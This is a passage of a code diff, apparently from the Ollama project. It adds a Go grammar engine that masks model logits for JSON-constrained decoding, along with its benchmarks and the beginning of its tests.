|
||||
// Skip escape sequence
|
||||
if inner[i+1] == 'u' && i+6 <= len(inner) {
|
||||
i += 6 // \uXXXX
|
||||
} else {
|
||||
i += 2 // \n, \t, etc.
|
||||
}
|
||||
continue
|
||||
}
|
||||
if inner[i] == '-' && i > 0 {
|
||||
return i
|
||||
}
|
||||
i++
|
||||
}
|
||||
return -1
|
||||
}
|
||||
|
||||
// parseRune parses a single rune from a string (handles escapes)
|
||||
func parseRune(s string) (rune, error) {
|
||||
if len(s) == 0 {
|
||||
return 0, fmt.Errorf("empty rune")
|
||||
}
|
||||
|
||||
// Handle escape sequences
|
||||
if s[0] == '\\' {
|
||||
if len(s) < 2 {
|
||||
return 0, fmt.Errorf("incomplete escape")
|
||||
}
|
||||
switch s[1] {
|
||||
case 'n':
|
||||
return '\n', nil
|
||||
case 't':
|
||||
return '\t', nil
|
||||
case 'r':
|
||||
return '\r', nil
|
||||
case '\\':
|
||||
return '\\', nil
|
||||
case '"':
|
||||
return '"', nil
|
||||
case '\'':
|
||||
return '\'', nil
|
||||
case 'u':
|
||||
if len(s) < 6 {
|
||||
return 0, fmt.Errorf("incomplete unicode escape")
|
||||
}
|
||||
val, err := strconv.ParseInt(s[2:6], 16, 32)
|
||||
if err != nil {
|
||||
return 0, fmt.Errorf("invalid unicode escape: %w", err)
|
||||
}
|
||||
return rune(val), nil
|
||||
default:
|
||||
return 0, fmt.Errorf("unknown escape: \\%c", s[1])
|
||||
}
|
||||
}
|
||||
|
||||
// Plain character
|
||||
r, _ := utf8.DecodeRuneInString(s)
|
||||
if r == utf8.RuneError {
|
||||
return 0, fmt.Errorf("invalid utf8")
|
||||
}
|
||||
return r, nil
|
||||
}
|
||||
|
||||
// unescapeLiteral unescapes a literal pattern string
|
||||
func unescapeLiteral(pattern string) (string, error) {
|
||||
// Try strconv.Unquote if it looks quoted
|
||||
if len(pattern) >= 2 && pattern[0] == '"' && pattern[len(pattern)-1] == '"' {
|
||||
unquoted, err := strconv.Unquote(pattern)
|
||||
if err != nil {
|
||||
return "", err
|
||||
}
|
||||
return unquoted, nil
|
||||
}
|
||||
|
||||
// If no backslashes, return as-is
|
||||
if !strings.Contains(pattern, "\\") {
|
||||
return pattern, nil
|
||||
}
|
||||
|
||||
// Manual unescape
|
||||
var result strings.Builder
|
||||
i := 0
|
||||
for i < len(pattern) {
|
||||
if pattern[i] == '\\' && i+1 < len(pattern) {
|
||||
switch pattern[i+1] {
|
||||
case 'n':
|
||||
result.WriteByte('\n')
|
||||
i += 2
|
||||
case 't':
|
||||
result.WriteByte('\t')
|
||||
i += 2
|
||||
case 'r':
|
||||
result.WriteByte('\r')
|
||||
i += 2
|
||||
case '\\':
|
||||
result.WriteByte('\\')
|
||||
i += 2
|
||||
case '"':
|
||||
result.WriteByte('"')
|
||||
i += 2
|
||||
case '\'':
|
||||
result.WriteByte('\'')
|
||||
i += 2
|
||||
case 'u':
|
||||
if i+6 <= len(pattern) {
|
||||
val, err := strconv.ParseInt(pattern[i+2:i+6], 16, 32)
|
||||
if err != nil {
|
||||
return "", fmt.Errorf("invalid unicode escape at %d", i)
|
||||
}
|
||||
result.WriteRune(rune(val))
|
||||
i += 6
|
||||
} else {
|
||||
return "", fmt.Errorf("incomplete unicode escape at %d", i)
|
||||
}
|
||||
default:
|
||||
// Reject unknown escape sequences
|
||||
return "", fmt.Errorf("unknown escape sequence: \\%c at position %d", pattern[i+1], i)
|
||||
}
|
||||
} else {
|
||||
result.WriteByte(pattern[i])
|
||||
i++
|
||||
}
|
||||
}
|
||||
return result.String(), nil
|
||||
}
|
||||
329
x/grammar/engine.go
Normal file
329
x/grammar/engine.go
Normal file
@@ -0,0 +1,329 @@
|
||||
//go:build mlx
|
||||
|
||||
package grammar
|
||||
|
||||
import (
|
||||
"container/list"
|
||||
"fmt"
|
||||
"math"
|
||||
"sync"
|
||||
|
||||
"github.com/ollama/ollama/x/imagegen/mlx"
|
||||
)
|
||||
|
||||
// maskCache provides LRU caching for computed masks.
|
||||
type maskCache struct {
|
||||
cache map[uint64]*list.Element
|
||||
order *list.List
|
||||
maxSize int
|
||||
mu sync.Mutex
|
||||
}
|
||||
|
||||
type maskEntry struct {
|
||||
sig uint64
|
||||
mask *mlx.Array
|
||||
}
|
||||
|
||||
// newMaskCache creates a new mask cache with the given max size
|
||||
// If maxSize <= 0, the cache is disabled (Get/Put are no-ops)
|
||||
func newMaskCache(maxSize int) *maskCache {
|
||||
if maxSize <= 0 {
|
||||
return &maskCache{
|
||||
cache: make(map[uint64]*list.Element),
|
||||
order: list.New(),
|
||||
maxSize: 0, // Signals disabled
|
||||
}
|
||||
}
|
||||
return &maskCache{
|
||||
cache: make(map[uint64]*list.Element),
|
||||
order: list.New(),
|
||||
maxSize: maxSize,
|
||||
}
|
||||
}
|
||||
|
||||
// get retrieves a cached mask, returning nil if not found.
|
||||
// Updates LRU order on cache hit.
|
||||
func (c *maskCache) get(sig uint64) *mlx.Array {
|
||||
if c.maxSize <= 0 {
|
||||
return nil // Cache disabled
|
||||
}
|
||||
c.mu.Lock()
|
||||
defer c.mu.Unlock()
|
||||
if elem, ok := c.cache[sig]; ok {
|
||||
c.order.MoveToFront(elem)
|
||||
return elem.Value.(*maskEntry).mask
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// put stores a mask in the cache with LRU eviction.
|
||||
func (c *maskCache) put(sig uint64, mask *mlx.Array) {
|
||||
if c.maxSize <= 0 {
|
||||
return // Cache disabled
|
||||
}
|
||||
c.mu.Lock()
|
||||
defer c.mu.Unlock()
|
||||
|
||||
if elem, exists := c.cache[sig]; exists {
|
||||
c.order.MoveToFront(elem)
|
||||
return
|
||||
}
|
||||
|
||||
// Evict oldest if at capacity (safe since maxSize > 0)
|
||||
if c.order.Len() >= c.maxSize {
|
||||
oldest := c.order.Back()
|
||||
if oldest != nil {
|
||||
entry := oldest.Value.(*maskEntry)
|
||||
entry.mask.Free()
|
||||
delete(c.cache, entry.sig)
|
||||
c.order.Remove(oldest)
|
||||
}
|
||||
}
|
||||
|
||||
elem := c.order.PushFront(&maskEntry{sig: sig, mask: mask})
|
||||
c.cache[sig] = elem
|
||||
}
|
||||
|
||||
// clear frees all cached masks.
|
||||
func (c *maskCache) clear() {
|
||||
c.mu.Lock()
|
||||
defer c.mu.Unlock()
|
||||
for elem := c.order.Front(); elem != nil; elem = elem.Next() {
|
||||
elem.Value.(*maskEntry).mask.Free()
|
||||
}
|
||||
c.cache = make(map[uint64]*list.Element)
|
||||
c.order.Init()
|
||||
}
|
||||
|
||||
// size returns the number of cached masks.
|
||||
func (c *maskCache) size() int {
|
||||
c.mu.Lock()
|
||||
defer c.mu.Unlock()
|
||||
return len(c.cache)
|
||||
}
|
||||
|
||||
// Engine applies grammar constraints to model outputs using MLX.
|
||||
// It uses a token→pda bridge for strict correctness with arbitrary BPE tokens.
|
||||
type Engine struct {
|
||||
// The compiled grammar
|
||||
grammar *Grammar
|
||||
|
||||
// bridge for token validation
|
||||
bridge *bridge
|
||||
analyzer *analyzer
|
||||
|
||||
// Current parser state (configSet for nondeterminism)
|
||||
configSet *configSet
|
||||
|
||||
// Token vocabulary from the model
|
||||
vocab []string
|
||||
tokenToID map[string]int // O(1) lookup for AcceptString
|
||||
|
||||
// Mask cache: configSig → valid token mask (LRU)
|
||||
maskCache *maskCache
|
||||
|
||||
// Cached negative infinity mask for invalid tokens
|
||||
negInfMask *mlx.Array
|
||||
|
||||
// Threshold for comparison (0.5 since mask values are 0 or 1)
|
||||
threshold *mlx.Array
|
||||
|
||||
// Vocabulary size
|
||||
vocabSize int32
|
||||
|
||||
// Reusable buffers for candidate filtering (avoid allocations)
|
||||
candidateMark []bool // indexed by tokenID, true if in candidate set
|
||||
touched []int // tokenIDs that were marked (for reset)
|
||||
dpCandidates []int // candidates requiring DP validation
|
||||
|
||||
// Reusable buffer for valid token indices (for GPU scatter)
|
||||
validTokenIDs []int32
|
||||
}
|
||||
|
||||
// EngineOption configures an Engine
|
||||
type EngineOption func(*Engine)
|
||||
|
||||
// WithMaskCacheSize sets the mask cache size (default 1024)
|
||||
func WithMaskCacheSize(size int) EngineOption {
|
||||
return func(e *Engine) {
|
||||
e.maskCache = newMaskCache(size)
|
||||
}
|
||||
}
|
||||
|
||||
// NewEngine creates a new constrained decoding engine.
|
||||
// grammar is the compiled grammar (use JSONGrammar() or ParseEBNF()).
|
||||
// vocab is the list of token strings from the model's tokenizer.
|
||||
func NewEngine(grammar *Grammar, vocab []string, opts ...EngineOption) (*Engine, error) {
|
||||
if grammar == nil {
|
||||
return nil, fmt.Errorf("grammar cannot be nil")
|
||||
}
|
||||
|
||||
// Build analyzer and bridge
|
||||
analyzer := newAnalyzer(vocab, grammar.matcher)
|
||||
bridge := newBridge(grammar.pda, analyzer)
|
||||
|
||||
// Initialize config set from pda initial state
|
||||
initialConfig := newConfigSet(grammar.pda.StartState, nil)
|
||||
|
||||
// Build token lookup map for O(1) AcceptString
|
||||
tokenToID := make(map[string]int, len(vocab))
|
||||
for i, tok := range vocab {
|
||||
tokenToID[tok] = i
|
||||
}
|
||||
|
||||
e := &Engine{
|
||||
grammar: grammar,
|
||||
bridge: bridge,
|
||||
analyzer: analyzer,
|
||||
configSet: initialConfig,
|
||||
vocab: vocab,
|
||||
tokenToID: tokenToID,
|
||||
maskCache: newMaskCache(1024),
|
||||
vocabSize: int32(len(vocab)),
|
||||
candidateMark: make([]bool, len(vocab)),
|
||||
touched: make([]int, 0, 10000),
|
||||
validTokenIDs: make([]int32, 0, 10000),
|
||||
}
|
||||
|
||||
// Apply options
|
||||
for _, opt := range opts {
|
||||
opt(e)
|
||||
}
|
||||
|
||||
// Create the negative infinity mask and threshold
|
||||
if e.vocabSize > 0 {
|
||||
e.negInfMask = mlx.FullDtype(float32(math.Inf(-1)), mlx.DtypeFloat32, e.vocabSize)
|
||||
mlx.Keep(e.negInfMask)
|
||||
|
||||
e.threshold = mlx.NewScalarArray(0.5)
|
||||
mlx.Keep(e.threshold)
|
||||
}
|
||||
|
||||
return e, nil
|
||||
}
|
||||
|
||||
// ApplyMask applies grammar constraints to logits.
|
||||
// Returns logits with invalid tokens set to -inf.
|
||||
func (e *Engine) ApplyMask(logits *mlx.Array) *mlx.Array {
|
||||
sig := e.configSet.signature()
|
||||
|
||||
// Check state cache first (exact state match)
|
||||
if cached := e.maskCache.get(sig); cached != nil {
|
||||
condition := mlx.GreaterEqual(cached, e.threshold)
|
||||
return mlx.Where(condition, logits, e.negInfMask)
|
||||
}
|
||||
|
||||
// Compute valid tokens using candidate filtering:
|
||||
// 1. Get valid terminal IDs from current grammar state
|
||||
// 2. Get candidate tokens (those that START with valid terminals)
|
||||
// 3. Run DP validation only on candidates
|
||||
// This is O(candidates) instead of O(vocab_size)
|
||||
|
||||
validTerminalIDs := e.bridge.validTerminalIDs(e.configSet)
|
||||
|
||||
// Use pre-partitioned token groups for fast candidate building
|
||||
// This eliminates per-token branching - just direct slice appends
|
||||
e.validTokenIDs = e.validTokenIDs[:0]
|
||||
e.dpCandidates = e.dpCandidates[:0]
|
||||
e.touched = e.touched[:0]
|
||||
|
||||
for _, tid := range validTerminalIDs {
|
||||
groups := e.analyzer.terminalGroups(tid)
|
||||
|
||||
// Direct append of exact matches (no per-token check needed)
|
||||
e.validTokenIDs = append(e.validTokenIDs, groups.ExactMatches...)
|
||||
|
||||
// Collect DP candidates (may have duplicates across terminals)
|
||||
for _, tokenID := range groups.DPCandidates {
|
||||
if !e.candidateMark[tokenID] {
|
||||
e.candidateMark[tokenID] = true
|
||||
e.dpCandidates = append(e.dpCandidates, tokenID)
|
||||
e.touched = append(e.touched, tokenID)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Reset marks for next call
|
||||
for _, id := range e.touched {
|
||||
e.candidateMark[id] = false
|
||||
}
|
||||
|
||||
for _, tokenID := range e.dpCandidates {
|
||||
if e.bridge.IsTokenValid(tokenID, e.configSet) {
|
||||
e.validTokenIDs = append(e.validTokenIDs, int32(tokenID))
|
||||
}
|
||||
}
|
||||
|
||||
// Create and cache the mask on GPU using index updates
|
||||
mask := mlx.Zeros([]int32{e.vocabSize})
|
||||
if len(e.validTokenIDs) > 0 {
|
||||
indices := mlx.NewArrayInt32(e.validTokenIDs, []int32{int32(len(e.validTokenIDs))})
|
||||
values := mlx.Ones(int32(len(e.validTokenIDs)))
|
||||
mask = mlx.PutAlongAxis(mask, indices, values, 0)
|
||||
}
|
||||
mlx.Keep(mask)
|
||||
|
||||
// Cache by state signature
|
||||
e.maskCache.put(sig, mask)
|
||||
|
||||
// Apply mask
|
||||
condition := mlx.GreaterEqual(mask, e.threshold)
|
||||
return mlx.Where(condition, logits, e.negInfMask)
|
||||
}
|
||||
|
||||
// Accept processes a token and updates the parser state.
|
||||
// Returns true if the token was valid and accepted.
|
||||
func (e *Engine) Accept(tokenID int) bool {
|
||||
if tokenID < 0 || tokenID >= len(e.vocab) {
|
||||
return false
|
||||
}
|
||||
|
||||
newConfig := e.bridge.acceptToken(tokenID, e.configSet)
|
||||
if newConfig == nil {
|
||||
return false
|
||||
}
|
||||
e.configSet = newConfig
|
||||
return true
|
||||
}
|
||||
|
||||
// AcceptString processes a token string directly.
|
||||
// Returns true if the token was valid and accepted.
|
||||
func (e *Engine) AcceptString(token string) bool {
|
||||
if id, ok := e.tokenToID[token]; ok {
|
||||
return e.Accept(id)
|
||||
}
|
||||
return false
|
||||
}
|
||||
|
||||
// IsComplete returns true if the current state is accepting.
|
||||
func (e *Engine) IsComplete() bool {
|
||||
return e.bridge.isAccepting(e.configSet)
|
||||
}
|
||||
|
||||
// Reset resets the engine to initial state.
|
||||
func (e *Engine) Reset() {
|
||||
e.configSet = newConfigSet(e.grammar.pda.StartState, nil)
|
||||
}
|
||||
|
||||
// validTokens returns the indices of tokens that are currently valid.
|
||||
func (e *Engine) validTokens() []int {
|
||||
return e.bridge.validTokens(e.configSet)
|
||||
}
|
||||
|
||||
// validTerminals returns the valid terminal patterns from the current state.
|
||||
func (e *Engine) validTerminals() []string {
|
||||
return e.bridge.validTerminals(e.configSet)
|
||||
}
|
||||
|
||||
// Close releases MLX resources.
|
||||
func (e *Engine) Close() {
|
||||
if e.maskCache != nil {
|
||||
e.maskCache.clear()
|
||||
}
|
||||
if e.negInfMask != nil {
|
||||
e.negInfMask.Free()
|
||||
}
|
||||
if e.threshold != nil {
|
||||
e.threshold.Free()
|
||||
}
|
||||
}
|
||||
414
x/grammar/engine_benchmark_test.go
Normal file
414
x/grammar/engine_benchmark_test.go
Normal file
@@ -0,0 +1,414 @@
|
||||
//go:build mlx
|
||||
|
||||
package grammar
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"testing"
|
||||
|
||||
"github.com/ollama/ollama/x/imagegen/mlx"
|
||||
)
|
||||
|
||||
// newBenchEngine creates a JSON engine for benchmarks
|
||||
func newBenchEngine(b *testing.B, vocab []string) *Engine {
|
||||
b.Helper()
|
||||
grammar, err := JSONGrammar()
|
||||
if err != nil {
|
||||
b.Fatalf("failed to create JSON grammar: %v", err)
|
||||
}
|
||||
e, err := NewEngine(grammar, vocab)
|
||||
if err != nil {
|
||||
b.Fatalf("failed to create engine: %v", err)
|
||||
}
|
||||
return e
|
||||
}
|
||||
|
||||
// Vocabulary sizes to test (matching real models)
|
||||
var vocabSizes = []int{
|
||||
32000, // Llama 2
|
||||
128000, // Llama 3
|
||||
256000, // Large models
|
||||
}
|
||||
|
||||
// createBenchVocabN creates a vocabulary of size n with realistic token distribution
|
||||
func createBenchVocabN(n int) []string {
|
||||
vocab := make([]string, n)
|
||||
|
||||
// JSON structural tokens (first 20)
|
||||
jsonTokens := []string{
|
||||
"{", "}", "[", "]", ":", ",",
|
||||
"true", "false", "null",
|
||||
" ", "\n", "\t", "\r",
|
||||
"\"", "'",
|
||||
}
|
||||
for i, t := range jsonTokens {
|
||||
if i < n {
|
||||
vocab[i] = t
|
||||
}
|
||||
}
|
||||
|
||||
// String tokens (indices 20-1000)
|
||||
stringIdx := 20
|
||||
for i := 0; i < 980 && stringIdx+i < n; i++ {
|
||||
vocab[stringIdx+i] = fmt.Sprintf("\"token%d\"", i)
|
||||
}
|
||||
|
||||
// Number tokens (indices 1000-2000)
|
||||
numberIdx := 1000
|
||||
for i := 0; i < 1000 && numberIdx+i < n; i++ {
|
||||
vocab[numberIdx+i] = fmt.Sprintf("%d", i)
|
||||
}
|
||||
|
||||
// Generic tokens (rest)
|
||||
for i := 2000; i < n; i++ {
|
||||
vocab[i] = fmt.Sprintf("tok%d", i)
|
||||
}
|
||||
|
||||
return vocab
|
||||
}
|
||||
|
||||
// ============ Core Performance Benchmarks ============
|
||||
|
||||
// BenchmarkApplyMask_32k measures mask application with 32k vocab
|
||||
func BenchmarkApplyMask_32k(b *testing.B) {
|
||||
benchmarkApplyMask(b, 32000)
|
||||
}
|
||||
|
||||
// BenchmarkApplyMask_128k measures mask application with 128k vocab
|
||||
func BenchmarkApplyMask_128k(b *testing.B) {
|
||||
benchmarkApplyMask(b, 128000)
|
||||
}
|
||||
|
||||
// BenchmarkApplyMask_256k measures mask application with 256k vocab
|
||||
func BenchmarkApplyMask_256k(b *testing.B) {
|
||||
benchmarkApplyMask(b, 256000)
|
||||
}
|
||||
|
||||
func benchmarkApplyMask(b *testing.B, vocabSize int) {
|
||||
vocab := createBenchVocabN(vocabSize)
|
||||
e := newBenchEngine(b, vocab)
|
||||
defer e.Close()
|
||||
|
||||
logits := mlx.Ones(int32(vocabSize))
|
||||
mlx.Keep(logits)
|
||||
|
||||
// Warm up
|
||||
for i := 0; i < 10; i++ {
|
||||
masked := e.ApplyMask(logits)
|
||||
mlx.Eval(masked)
|
||||
}
|
||||
|
||||
b.ResetTimer()
|
||||
b.ReportAllocs()
|
||||
|
||||
for i := 0; i < b.N; i++ {
|
||||
masked := e.ApplyMask(logits)
|
||||
mlx.Eval(masked)
|
||||
}
|
||||
|
||||
b.ReportMetric(float64(vocabSize), "vocab_size")
|
||||
}
|
||||
|
||||
// ============ state-Dependent Benchmarks ============
|
||||
|
||||
// BenchmarkApplyMaskAfterBrace measures mask after { (STRING or } valid)
|
||||
func BenchmarkApplyMaskAfterBrace(b *testing.B) {
|
||||
vocab := createBenchVocabN(128000)
|
||||
e := newBenchEngine(b, vocab)
|
||||
defer e.Close()
|
||||
|
||||
e.AcceptString("{")
|
||||
|
||||
logits := mlx.Ones(int32(128000))
|
||||
mlx.Keep(logits)
|
||||
|
||||
b.ResetTimer()
|
||||
for i := 0; i < b.N; i++ {
|
||||
masked := e.ApplyMask(logits)
|
||||
mlx.Eval(masked)
|
||||
}
|
||||
}
|
||||
|
||||
// BenchmarkApplyMaskMidObject measures mask in middle of object
|
||||
func BenchmarkApplyMaskMidObject(b *testing.B) {
|
||||
vocab := createBenchVocabN(128000)
|
||||
e := newBenchEngine(b, vocab)
|
||||
defer e.Close()
|
||||
|
||||
// state: {"key": _value_
|
||||
e.AcceptString("{")
|
||||
e.AcceptString("\"key\"")
|
||||
e.AcceptString(":")
|
||||
|
||||
logits := mlx.Ones(int32(128000))
|
||||
mlx.Keep(logits)
|
||||
|
||||
b.ResetTimer()
|
||||
for i := 0; i < b.N; i++ {
|
||||
masked := e.ApplyMask(logits)
|
||||
mlx.Eval(masked)
|
||||
}
|
||||
}
|
||||
|
||||
// ============ Token Sequence Benchmarks ============
|
||||
|
||||
// BenchmarkSequence_SimpleObject benchmarks {"key": "value"}
|
||||
func BenchmarkSequence_SimpleObject(b *testing.B) {
|
||||
vocab := createBenchVocabN(128000)
|
||||
e := newBenchEngine(b, vocab)
|
||||
defer e.Close()
|
||||
|
||||
logits := mlx.Ones(int32(128000))
|
||||
mlx.Keep(logits)
|
||||
|
||||
sequence := []string{"{", "\"key\"", ":", "\"value\"", "}"}
|
||||
|
||||
b.ResetTimer()
|
||||
for i := 0; i < b.N; i++ {
|
||||
e.Reset()
|
||||
for _, token := range sequence {
|
||||
masked := e.ApplyMask(logits)
|
||||
mlx.Eval(masked)
|
||||
e.AcceptString(token)
|
||||
}
|
||||
}
|
||||
|
||||
b.ReportMetric(float64(len(sequence)), "tokens")
|
||||
}
|
||||
|
||||
// BenchmarkSequence_NestedObject benchmarks {"a": {"b": {"c": 1}}}
|
||||
func BenchmarkSequence_NestedObject(b *testing.B) {
|
||||
vocab := createBenchVocabN(128000)
|
||||
e := newBenchEngine(b, vocab)
|
||||
defer e.Close()
|
||||
|
||||
logits := mlx.Ones(int32(128000))
|
||||
mlx.Keep(logits)
|
||||
|
||||
sequence := []string{
|
||||
"{", "\"a\"", ":", "{", "\"b\"", ":", "{", "\"c\"", ":", "1", "}", "}", "}",
|
||||
}
|
||||
|
||||
b.ResetTimer()
|
||||
for i := 0; i < b.N; i++ {
|
||||
e.Reset()
|
||||
for _, token := range sequence {
|
||||
masked := e.ApplyMask(logits)
|
||||
mlx.Eval(masked)
|
||||
e.AcceptString(token)
|
||||
}
|
||||
}
|
||||
|
||||
b.ReportMetric(float64(len(sequence)), "tokens")
|
||||
}
|
||||
|
||||
// BenchmarkSequence_LargeArray benchmarks [1, 2, 3, ..., 100]
|
||||
func BenchmarkSequence_LargeArray(b *testing.B) {
|
||||
vocab := createBenchVocabN(128000)
|
||||
e := newBenchEngine(b, vocab)
|
||||
defer e.Close()
|
||||
|
||||
logits := mlx.Ones(int32(128000))
|
||||
mlx.Keep(logits)
|
||||
|
||||
// Build sequence: [1, 2, 3, ..., 50]
|
||||
sequence := []string{"["}
|
||||
for i := 1; i <= 50; i++ {
|
||||
sequence = append(sequence, fmt.Sprintf("%d", i))
|
||||
if i < 50 {
|
||||
sequence = append(sequence, ",")
|
||||
}
|
||||
}
|
||||
sequence = append(sequence, "]")
|
||||
|
||||
b.ResetTimer()
|
||||
for i := 0; i < b.N; i++ {
|
||||
e.Reset()
|
||||
for _, token := range sequence {
|
||||
masked := e.ApplyMask(logits)
|
||||
mlx.Eval(masked)
|
||||
e.AcceptString(token)
|
||||
}
|
||||
}
|
||||
|
||||
b.ReportMetric(float64(len(sequence)), "tokens")
|
||||
}
|
||||
|
||||
// BenchmarkSequence_MixedTypes benchmarks complex mixed-type object
|
||||
func BenchmarkSequence_MixedTypes(b *testing.B) {
|
||||
vocab := createBenchVocabN(128000)
|
||||
e := newBenchEngine(b, vocab)
|
||||
defer e.Close()
|
||||
|
||||
logits := mlx.Ones(int32(128000))
|
||||
mlx.Keep(logits)
|
||||
|
||||
sequence := []string{
|
||||
"{",
|
||||
"\"name\"", ":", "\"test\"", ",",
|
||||
"\"count\"", ":", "42", ",",
|
||||
"\"enabled\"", ":", "true", ",",
|
||||
"\"data\"", ":", "null", ",",
|
||||
"\"items\"", ":", "[", "1", ",", "2", ",", "3", "]",
|
||||
"}",
|
||||
}
|
||||
|
||||
b.ResetTimer()
|
||||
for i := 0; i < b.N; i++ {
|
||||
e.Reset()
|
||||
for _, token := range sequence {
|
||||
masked := e.ApplyMask(logits)
|
||||
mlx.Eval(masked)
|
||||
e.AcceptString(token)
|
||||
}
|
||||
}
|
||||
|
||||
b.ReportMetric(float64(len(sequence)), "tokens")
|
||||
}
|
||||
|
||||
// ============ Component Benchmarks ============
|
||||
|
||||
// BenchmarkValidInputs measures pda valid input computation
|
||||
func BenchmarkValidInputs(b *testing.B) {
|
||||
vocab := createBenchVocabN(128000)
|
||||
e := newBenchEngine(b, vocab)
|
||||
defer e.Close()
|
||||
|
||||
b.ResetTimer()
|
||||
for i := 0; i < b.N; i++ {
|
||||
_ = e.validTerminals()
|
||||
}
|
||||
}
|
||||
|
||||
// BenchmarkStateTransition measures pda state transition
|
||||
func BenchmarkStateTransition(b *testing.B) {
|
||||
vocab := createBenchVocabN(128000)
|
||||
e := newBenchEngine(b, vocab)
|
||||
defer e.Close()
|
||||
|
||||
sequence := []string{"{", "\"key\"", ":", "\"value\"", "}"}
|
||||
|
||||
b.ResetTimer()
|
||||
for i := 0; i < b.N; i++ {
|
||||
e.Reset()
|
||||
for _, token := range sequence {
|
||||
e.AcceptString(token)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// BenchmarkConstrainedGrammar_128k benchmarks x/grammar (graph only, no eval).
|
||||
func BenchmarkConstrainedGrammar_128k(b *testing.B) {
|
||||
vocab := createBenchVocabN(128000)
|
||||
e := newBenchEngine(b, vocab)
|
||||
defer e.Close()
|
||||
|
||||
logits := mlx.Ones(int32(128000))
|
||||
mlx.Keep(logits)
|
||||
|
||||
// Warm up
|
||||
for i := 0; i < 10; i++ {
|
||||
masked := e.ApplyMask(logits)
|
||||
mlx.Eval(masked)
|
||||
}
|
||||
|
||||
b.ResetTimer()
|
||||
for i := 0; i < b.N; i++ {
|
||||
_ = e.ApplyMask(logits) // Graph only, no eval
|
||||
}
|
||||
}
|
||||
|
||||
// BenchmarkNewEngine measures one-time engine initialization.
|
||||
func BenchmarkNewEngine_32k(b *testing.B) {
|
||||
benchmarkNewEngine(b, 32000)
|
||||
}
|
||||
|
||||
func BenchmarkNewEngine_128k(b *testing.B) {
|
||||
benchmarkNewEngine(b, 128000)
|
||||
}
|
||||
|
||||
func benchmarkNewEngine(b *testing.B, vocabSize int) {
|
||||
vocab := createBenchVocabN(vocabSize)
|
||||
|
||||
b.ResetTimer()
|
||||
for i := 0; i < b.N; i++ {
|
||||
e := newBenchEngine(b, vocab)
|
||||
e.Close()
|
||||
}
|
||||
}
|
||||
|
||||
// ============ Memory Benchmarks ============
|
||||
|
||||
func BenchmarkMemoryAllocs_32k(b *testing.B) {
|
||||
benchmarkMemoryAllocs(b, 32000)
|
||||
}
|
||||
|
||||
func BenchmarkMemoryAllocs_128k(b *testing.B) {
|
||||
benchmarkMemoryAllocs(b, 128000)
|
||||
}
|
||||
|
||||
func benchmarkMemoryAllocs(b *testing.B, vocabSize int) {
|
||||
vocab := createBenchVocabN(vocabSize)
|
||||
e := newBenchEngine(b, vocab)
|
||||
defer e.Close()
|
||||
|
||||
logits := mlx.Ones(int32(vocabSize))
|
||||
mlx.Keep(logits)
|
||||
|
||||
b.ReportAllocs()
|
||||
b.ResetTimer()
|
||||
|
||||
for i := 0; i < b.N; i++ {
|
||||
masked := e.ApplyMask(logits)
|
||||
mlx.Eval(masked)
|
||||
}
|
||||
}
|
||||
|
||||
// ============ No-Eval Benchmarks (simulating LLM graph integration) ============
|
||||
|
||||
// BenchmarkApplyMaskNoEval_128k measures mask generation WITHOUT GPU sync
|
||||
// This simulates adding mask to LLM compute graph
|
||||
func BenchmarkApplyMaskNoEval_128k(b *testing.B) {
|
||||
vocab := createBenchVocabN(128000)
|
||||
e := newBenchEngine(b, vocab)
|
||||
defer e.Close()
|
||||
|
||||
logits := mlx.Ones(int32(128000))
|
||||
mlx.Keep(logits)
|
||||
|
||||
// Warm up
|
||||
for i := 0; i < 10; i++ {
|
||||
masked := e.ApplyMask(logits)
|
||||
mlx.Eval(masked)
|
||||
}
|
||||
|
||||
b.ResetTimer()
|
||||
for i := 0; i < b.N; i++ {
|
||||
_ = e.ApplyMask(logits) // No Eval - just build graph
|
||||
}
|
||||
}
|
||||
|
||||
// BenchmarkSequenceNoEval simulates real LLM usage - build graph, eval once at end
|
||||
func BenchmarkSequenceNoEval_SimpleObject(b *testing.B) {
|
||||
vocab := createBenchVocabN(128000)
|
||||
e := newBenchEngine(b, vocab)
|
||||
defer e.Close()
|
||||
|
||||
logits := mlx.Ones(int32(128000))
|
||||
mlx.Keep(logits)
|
||||
|
||||
sequence := []string{"{", "\"key\"", ":", "\"value\"", "}"}
|
||||
|
||||
b.ResetTimer()
|
||||
for i := 0; i < b.N; i++ {
|
||||
e.Reset()
|
||||
var lastMasked *mlx.Array
|
||||
for _, token := range sequence {
|
||||
lastMasked = e.ApplyMask(logits) // Build graph only
|
||||
e.AcceptString(token)
|
||||
}
|
||||
mlx.Eval(lastMasked) // Single eval at end
|
||||
}
|
||||
|
||||
b.ReportMetric(float64(len(sequence)), "tokens")
|
||||
}
|
||||
689
x/grammar/engine_test.go
Normal file
689
x/grammar/engine_test.go
Normal file
@@ -0,0 +1,689 @@
|
||||
//go:build mlx
|
||||
|
||||
package grammar
|
||||
|
||||
import (
|
||||
"testing"
|
||||
|
||||
"github.com/ollama/ollama/x/imagegen/mlx"
|
||||
)
|
||||
|
||||
// newTestEngine creates a JSON engine for testing
|
||||
func newTestEngine(t testing.TB, vocab []string) *Engine {
|
||||
t.Helper()
|
||||
grammar, err := JSONGrammar()
|
||||
if err != nil {
|
||||
t.Fatalf("failed to create JSON grammar: %v", err)
|
||||
}
|
||||
e, err := NewEngine(grammar, vocab)
|
||||
if err != nil {
|
||||
t.Fatalf("failed to create engine: %v", err)
|
||||
}
|
||||
return e
|
||||
}
|
||||
|
||||
// Mock vocabulary for testing
|
||||
func testVocab() []string {
|
||||
return []string{
|
||||
"{", // 0: object start
|
||||
"}", // 1: object end
|
||||
"[", // 2: array start
|
||||
"]", // 3: array end
|
||||
":", // 4: colon
|
||||
",", // 5: comma
|
||||
"\"key\"", // 6: string (quoted)
|
||||
"\"val\"", // 7: string (quoted)
|
||||
"123", // 8: number
|
||||
"-42.5", // 9: number
|
||||
"true", // 10: boolean
|
||||
"false", // 11: boolean
|
||||
"null", // 12: null
|
||||
" ", // 13: whitespace (should be ignored)
|
||||
"\n", // 14: whitespace (should be ignored)
|
||||
"subword", // 15: bare word (NOT valid JSON - requires quotes)
|
||||
"hello", // 16: bare word (NOT valid JSON - requires quotes)
|
||||
}
|
||||
}
|
||||
|
||||
func TestNewEngine(t *testing.T) {
|
||||
vocab := testVocab()
|
||||
e := newTestEngine(t, vocab)
|
||||
defer e.Close()
|
||||
|
||||
if e.vocabSize != int32(len(vocab)) {
|
